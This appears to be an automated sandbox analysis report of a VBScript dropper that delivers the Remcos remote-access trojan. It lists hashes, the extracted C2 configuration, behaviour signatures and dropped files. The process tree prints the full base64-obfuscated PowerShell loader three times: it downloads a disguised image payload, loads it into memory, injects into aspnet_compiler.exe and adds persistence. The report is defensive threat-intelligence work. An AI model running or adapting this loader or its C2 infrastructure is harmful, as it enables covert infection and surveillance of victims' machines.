Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-12-2024 13:32

General

  • Target

    BBVAS.A..vbs

  • Size

    167KB

  • MD5

    3c217b6a70e1ff5e6ecb71ca0e89644a

  • SHA1

    d158bcee429368797c22f4c2f9a305c2ff37beae

  • SHA256

    4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9

  • SHA512

    38bb4918e229bb83c0f7f4f3ca086253f22197f44887f81dbe4aad019811b91799bc9206155c99906855372cdc0eb09f778913d8d2b59423c3b5e550585672db

  • SSDEEP

    1536:groJZFpjN3Z5cpeYTXOnBodK/fI81ltCwKoAVTmT2xc1k3TjSjjXuw7dk+aojwE3:grorj9Z5ccYKKIIyScjXx7dk+aojD

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg

exe.dropper

https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg

Extracted

Family

remcos

Botnet

NEW

C2

rem.pushswroller.eu:23101

firewarzone.ydns.eu:23101

sun.drillmmcsnk.eu:23101

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmcghghyrtssxr-7RL1P2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 9 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BBVAS.A..vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3532
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"
        3⤵
          PID:1752
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
            PID:1716
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:636
      • C:\Windows\system32\wscript.exe
        wscript.exe C:\ProgramData\haematachometer.vbs
        1⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            3⤵
              PID:3728
        • C:\Windows\system32\wscript.exe
          wscript.exe C:\ProgramData\haematachometer.vbs
          1⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1216
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1824

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\haematachometer.vbs

          Filesize

          167KB

          MD5

          3c217b6a70e1ff5e6ecb71ca0e89644a

          SHA1

          d158bcee429368797c22f4c2f9a305c2ff37beae

          SHA256

          4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9

          SHA512

          38bb4918e229bb83c0f7f4f3ca086253f22197f44887f81dbe4aad019811b91799bc9206155c99906855372cdc0eb09f778913d8d2b59423c3b5e550585672db

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

          Filesize

          734B

          MD5

          e192462f281446b5d1500d474fbacc4b

          SHA1

          5ed0044ac937193b78f9878ad7bac5c9ff7534ff

          SHA256

          f1ba9f1b63c447682ebf9de956d0da2a027b1b779abef9522d347d3479139a60

          SHA512

          cc69a761a4e8e1d4bf6585aa8e3e5a7dfed610f540a6d43a288ebb35b16e669874ed5d2b06756ee4f30854f6465c84ee423502fc5b67ee9e7758a2dab41b31d3

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

          Filesize

          192B

          MD5

          a65827d262a758bcdc555c124ac05fa3

          SHA1

          6bcf07c7fb616e634797059d9f25235d1f4864de

          SHA256

          a7a459aa6b8422fd382c148e7f1ac0c0679a7fe1605c3d535bbf39356fb32a1a

          SHA512

          6bbda2e1352264e7d49a969852ba7a28c34a238164d5ca32e8832178d49f6925f9e96ab1c76a85fdb3281135f266e6653e56ec46ee36a8aec830928363bffab6

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f41839a3fe2888c8b3050197bc9a0a05

          SHA1

          0798941aaf7a53a11ea9ed589752890aee069729

          SHA256

          224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

          SHA512

          2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DQ67RYHS\LDDIb[1].txt

          Filesize

          77KB

          MD5

          ea91e5a559cf86c5cc019abc9f4bd827

          SHA1

          c4d9d354cde9689da348b6db214b35a1c1a807bf

          SHA256

          a1dc46e1455acf53be3a11104d1930152a3b223aac8a520da0a6a4e370842308

          SHA512

          0603463b0fcdaeede0f600d098d2ba7a99ed1d446f6b9476558575cca5da18a9808f4fe1420831b831d5bc4adc6152d5ad5b697e7c33cecbbec00d27bf2c4a10

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          4665a94de698482478a11265a0f939c4

          SHA1

          50bbe45a006da471375dd986ab637d1717649c1c

          SHA256

          e7d50e69989c9c0fe9df96e44c32cb16fd1a83b4cf38b686a7068f7b04d694f1

          SHA512

          c7876f37866f74bc61133d5b4997976101a4f357a317d8f149a0d8f778f9e9a24af34adc153afc968c492a874303dd8786f014b9c09aae8e4f04aee03aa33cbd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          8e526a5b3accca64420929b62d241f08

          SHA1

          24c7296ccff903a5aaffda7e4e4ca449a72e49cc

          SHA256

          eb3b7f2a1f5a10f70f34e41742fa3b8ad23419611a3aa423979d9646ffff06c7

          SHA512

          b9caca465fccf6ffbf3e657c9438930e100c6d336cb33ddaa71c054e3789af9a5e748072214f4872ef4d773f19709d75b26b550f72f93c24948a4816420ea505

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p0dkctzf.gss.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/636-61-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-83-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-25-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-65-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-28-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-66-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-35-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-36-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-37-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-38-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-39-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-40-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-41-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-42-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-44-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-45-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-46-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-47-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-48-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-49-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-51-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-52-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-53-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-54-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-55-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-57-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-56-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-58-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-59-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-60-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-30-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-62-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-63-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-64-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-33-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-34-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-92-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-68-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-69-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-70-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-71-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-72-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-73-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-74-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-75-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-77-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-76-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-78-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-79-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-80-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-81-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-82-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-67-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-84-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-85-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-86-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-87-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-88-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-89-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-90-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/636-91-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1376-19-0x00007FFB673E0000-0x00007FFB67EA1000-memory.dmp

          Filesize

          10.8MB

        • memory/1376-17-0x00007FFB673E0000-0x00007FFB67EA1000-memory.dmp

          Filesize

          10.8MB

        • memory/1376-12-0x000002182C9B0000-0x000002182C9D2000-memory.dmp

          Filesize

          136KB

        • memory/1376-6-0x00007FFB673E3000-0x00007FFB673E5000-memory.dmp

          Filesize

          8KB

        • memory/1376-21-0x00007FFB673E0000-0x00007FFB67EA1000-memory.dmp

          Filesize

          10.8MB

        • memory/1376-18-0x00007FFB673E0000-0x00007FFB67EA1000-memory.dmp

          Filesize

          10.8MB

        • memory/1376-22-0x0000021855180000-0x000002185532A000-memory.dmp

          Filesize

          1.7MB

        • memory/1376-20-0x00007FFB673E3000-0x00007FFB673E5000-memory.dmp

          Filesize

          8KB

        • memory/1376-23-0x00007FFB673E0000-0x00007FFB67EA1000-memory.dmp

          Filesize

          10.8MB

